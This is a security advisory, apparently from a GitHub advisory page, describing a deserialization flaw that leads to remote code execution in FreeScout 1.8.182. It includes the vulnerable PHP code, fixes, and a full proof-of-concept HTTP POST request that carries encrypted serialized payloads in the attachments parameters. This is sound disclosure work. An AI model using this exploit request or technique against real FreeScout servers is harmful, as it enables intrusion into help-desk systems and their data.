Deserialization of untrusted data leads to Remote code execution (RCE) [9]

Product: FreeScout
Version: 1.8.182
CWE-ID:
• CWE-502: Deserialization of Untrusted Data
• CAPEC-586: Object Injection
CVSS vector v.4.0: 8.6 (AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)
Description: The application performs deserialization of data that can be tampered with. An attacker can create objects of arbitrary classes, as well as fully control their properties, thereby allowing them to manipulate the web application's logic.
Vulnerable scenarios: /conversation/ajax
Vulnerable parameters:
• POST attachments_all[]
• POST attachments[]
Exploitation conditions: authorized user, APP_KEY knowledge
Recommendations: Configure the web server to prevent the receipt of untrusted deserialized data or, if the architecture allows, use alternative data formats such as JSON or XML instead of serialized objects.
If this is not possible, follow the guidelines below:
• Explicitly define data types during deserialization;
• Ensure data integrity checks (e.g., using an HMAC hash function);
• Create a separate object to store deserialized data, as this causes the data to pass through secure input validation;
• Use transient fields to denote data that should not be serialized.

Researchers: Daniil Satyaev, Roman Cheremnykh, Artem Danilov (Positive Technologies)

Research

Vulnerable code:

Listing Code snippet exploiting the vulnerable function Helper::decrypt (app/Http/Controllers/ConversationController.php 3159-3171)

public function decodeAttachmentsIds($attachments_list)
    {
        foreach ($attachments_list as $i => $attachment_id) {
            $attachment_id_decrypted = \Helper::decrypt($attachment_id);
            if ($attachment_id_decrypted == $attachment_id) {
                unset($attachments_list[$i]);
            } else {
                $attachments_list[$i] = $attachment_id_decrypted;
            }
        }
        return $attachments_list;
    }

The code use insecure function \Helper::decrypt, which leads to deserialization and further Remote code execution (RCE).

Exploitation scenario:

Listing HTTP-request to exploit «Deserialization of untrusted data»

POST /conversation/ajax HTTP/1.1
Host: freescout.web-hacks.ru
Cookie: enduserportal_auth=eyJpdiI6IkhRQTZ5MnJjQitHXC84WHhtb1RabGF3PT0iLCJ2YWx1ZSI6IlBZMUF5ejF4MTJwaUJCdHFHQTE5Q25yNE8ySW9BQnpYZ09hdmwxeGVzeEMzcFp2anRzbXFZdnZUeHM5YTBUMXFxQUJIYkc3VDdSYU1OSW5BdVVRWVwvb1QzYVoycjRVMnFrVXRoZWxHZFU2NU94MW54R1VvNVFlMFlxNHlNMG5ybEZLQXZqOGRDUGhkbTU0ZzlhMW1MMmw3bnYwdlRhdUpXQUZVVnVlcXhKU0h3ZkVGQkp4OTFxR1ErQnZ3dDhFVGJxT0ZobDRCRGNRRW1MOTlVM2RWRCtFZHdpM0xGTXdUZTBpK3g0eDhOU3pDZHpFMVhFZEVXTlBmZ1wvaEZmS2N4QVdVaDlwNXVIQjVkcWl2bHoyWWozcjNDaXBvakNEeU0rNzhRbnU0R2ZGS0FuNFpheWRhaWdzMGJtVjR5Zk5BMHRHTzVkRjQ3YTVRMnhcL2t1SkdiYnp5ZDYraFVqVVdydWxMVmdBckFBTVZSWT0iLCJtYWMiOiJiMDEyNzQwMWQ1MjEwOGU4Y2Q4ZTI2YjZmZjIwZWZkODBlMzE2YmMyNzc3OTg4OGNmZjc5ZTkyNzE5NWRkYTQzIn0%3D; laravel_session=eyJpdiI6IlVwZUdqVXMrM1YyeXZXQWpON0UrSUE9PSIsInZhbHVlIjoiZnZZYjV5VFJXNHQ2ZjBUY0lpXC9UTjBPWTBMdTR5YVhjdnJ3MTNZM0ZcL3FVOXBSUHFmQnQxVnZaQVZrQzBibzdIOWV3cWhkQWlzU3VWSmhrSTJ2QUt3VG15bDZ1QjFOdlFEVnV3MFRiM1JZTFlDQ0hwb3Zza2FFa3RLM3NXRSs4TiIsIm1hYyI6Ijc0NDMwNWQ3YmJjMTIyODBlM2YxOTM5MDk2MzA2YjNiZDg5ZGE1MzY1NTQ0ZmI5Yzg3MzJlNTM0ZGY4NDZhZDEifQ%3D%3D; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlJGVEhIQTN5d0JZbGlpZlozSmprS3c9PSIsInZhbHVlIjoidzVTOEQzOXdiVlpMMGVBM0E1UFlMRGxmMks1Y1FTbHJhS3lcLzNTSXI3Q1lpSXpYUGZWQUZ3K1YzcW9nSVloTHZSdUxXejVnT3dvV1ZZSDhkS3pZbGtlT3FLb0QzdEJDSlcrajZNMzBkdmFDOTNTZE5rRkdWcDBNVW1MYmhBQ3hnN2ozQnI1aGVybW9pQ2w3TVNPM1NIQmpVOFwvblo5ZVwvQTl4d3djM1ZVQ1c3TDRlTGVqUkJmWFFKYkpudkxFOWJneG9LdHZybWc1S1JTWmJDamJQaUZqMWMwTE0zU1BEVzNweVwvK0hCTHQ3dms9IiwibWFjIjoiN2I4NzkyZGQ5MDU1OTg5Y2U2Njg4Mjc1MjQ4YWIxNTUzNDZiNzk4MzliYmNlYjYzOWYxYTU4OWUxMGFkNWYwYSJ9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Csrf-Token: IqCjwN7WYawh0rIQDJajIrBu5GhCQVfvD5Axgkw2
X-Requested-With: XMLHttpRequest
Content-Length: 1288
Origin: https://freescout.web-hacks.ru
Referer: https://freescout.web-hacks.ru/conversation/53
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

_token=IqCjwN7WYawh0rIQDJajIrBu5GhCQVfvD5Axgkw2&conversation_id=53&mailbox_id=4&is_note=&is_phone=&type=&thread_id=117&customer_id=&is_create=1&to%5B%5D=zzxxcc%40zxc.ru&subject=zxc&attachments_all%5B%5D=eyJpdiI6ICJvaVpTZnhvVmFnOGY5VTI0Tm5GQi9BPT0iLCAidmFsdWUiOiAiaU1xRzRHR1dtblc1UWRpU0l4cTZ1aGJZMUdaYVM5a1dCWjRIMGJPYWZuSGVNUFpSZ0dIOUdsaWc5eHVpTi9OeFRwaFZoWWQydVNCNloxRWhGYXYvNmxYajMzdUNNY09yWWRVdGtQNGtCOUpCNmY0YWFzbS9NZFg4OEc1RzNiUEc4ZkJMR1NEQURtaVJDck5Xd0dIOS94L3NoNWRmNkN2aHkyc1RwUGt1UklBZTdUOUI2RWZlalB0SVd3ZWZMSE5nVFpaMmhFU0thSURWWlc0dndVc0lwVDQ0ZlhlT1VPWDRCK3hxeCt5U1YyRUZKQ0J4RmhtMDJrNGpXbVNrUzMzaklYbm5ES0g3dHpsRzdTdVZRUmRpdk9EdUZ3NjVaa1pHUE1xMk1TQy9kdW9CYnFINVZoL0NHUUMvYkVYWmtIWGRsN2wyZTlXQk9NUkRsaUp3VTltUVJCSU5WeW5pZzF5cWdXaUVxaUVWeWIzVG0xcmhNS0o0Y1dGM1dWMWd4UnduVXNRZXlGZnJPVHdDdkdXTFd2YmdEb3VlemxidnlNUGphTE1LZjMzai9lUDVydng5aVFIejV3L2VxRWI5TVJ5QyIsICJtYWMiOiAiNzFjMGI2MDhhMGVmN2YwZjMyMjUwMGZiNGNmOTYyZDgyMzQ4MTc2M2ZiZDQ0ZmE5YWY0Yjk1OTRjOTkyYzEwNCIsICJ0YWciOiAiIn0=&attachments%5B%5D=eyJpdiI6ICJvaVpTZnhvVmFnOGY5VTI0Tm5GQi9BPT0iLCAidmFsdWUiOiAiaU1xRzRHR1dtblc1UWRpU0l4cTZ1aGJZMUdaYVM5a1dCWjRIMGJPYWZuSGVNUFpSZ0dIOUdsaWc5eHVpTi9OeFRwaFZoWWQydVNCNloxRWhGYXYvNmxYajMzdUNNY09yWWRVdGtQNGtCOUpCNmY0YWFzbS9NZFg4OEc1RzNiUEc4ZkJMR1NEQURtaVJDck5Xd0dIOS94L3NoNWRmNkN2aHkyc1RwUGt1UklBZTdUOUI2RWZlalB0SVd3ZWZMSE5nVFpaMmhFU0thSURWWlc0dndVc0lwVDQ0ZlhlT1VPWDRCK3hxeCt5U1YyRUZKQ0J4RmhtMDJrNGpXbVNrUzMzaklYbm5ES0g3dHpsRzdTdVZRUmRpdk9EdUZ3NjVaa1pHUE1xMk1TQy9kdW9CYnFINVZoL0NHUUMvYkVYWmtIWGRsN2wyZTlXQk9NUkRsaUp3VTltUVJCSU5WeW5pZzF5cWdXaUVxaUVWeWIzVG0xcmhNS0o0Y1dGM1dWMWd4UnduVXNRZXlGZnJPVHdDdkdXTFd2YmdEb3VlemxidnlNUGphTE1LZjMzai9lUDVydng5aVFIejV3L2VxRWI5TVJ5QyIsICJtYWMiOiAiNzFjMGI2MDhhMGVmN2YwZjMyMjUwMGZiNGNmOTYyZDgyMzQ4MTc2M2ZiZDQ0ZmE5YWY0Yjk1OTRjOTkyYzEwNCIsICJ0YWciOiAiIn0=&body=%3Cdiv%3Ezxc%3C%2Fdiv%3E&status=2&user_id=27&after_send=2&after_send_default=2&action=send_reply

The same problem with send_reply is also in the EndUserPortal module.

Listing Vulnerable code

public function processReplyAttachments($request)
    {
        $has_attachments = false;
        $attachments = [];
        if (!empty($request->attachments_all)) {
            //$embeds = [];
            $attachments_all = $this->decodeAttachmentsIds($request->attachments_all);
            if (!empty($request->attachments)) {
                $attachments = $this->decodeAttachmentsIds($request->attachments);
            }
            // if (!empty($request->embeds)) {
            //     $embeds = $this->decodeAttachmentsIds($request->embeds);
            // }
            $attachments_to_remove = array_diff($attachments_all, $attachments);
            if (count($attachments) && $attachments_to_remove != count($attachments)/* != count($embeds)*/) {
                $has_attachments = true;
            }
            //$attachments_to_remove = array_diff($attachments_to_remove, $embeds);
            Attachment::deleteByIds($attachments_to_remove);
        }

        return [
            'has_attachments' => $has_attachments,
            'attachments'     => $attachments,
        ];
    }

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Deserialization of untrusted data leads to Remote code execution (RCE) [9]

Package

Affected versions

Patched versions

Description

Deserialization of untrusted data leads to Remote code execution (RCE) [9]

Research

Severity

CVSS overall score

CVSS v4 base metrics

Exploitability Metrics

Vulnerable System Impact Metrics

Subsequent System Impact Metrics

CVSS v4 base metrics

Exploitability Metrics

Vulnerable System Impact Metrics

Subsequent System Impact Metrics

CVE ID

Weaknesses

Deserialization of Untrusted Data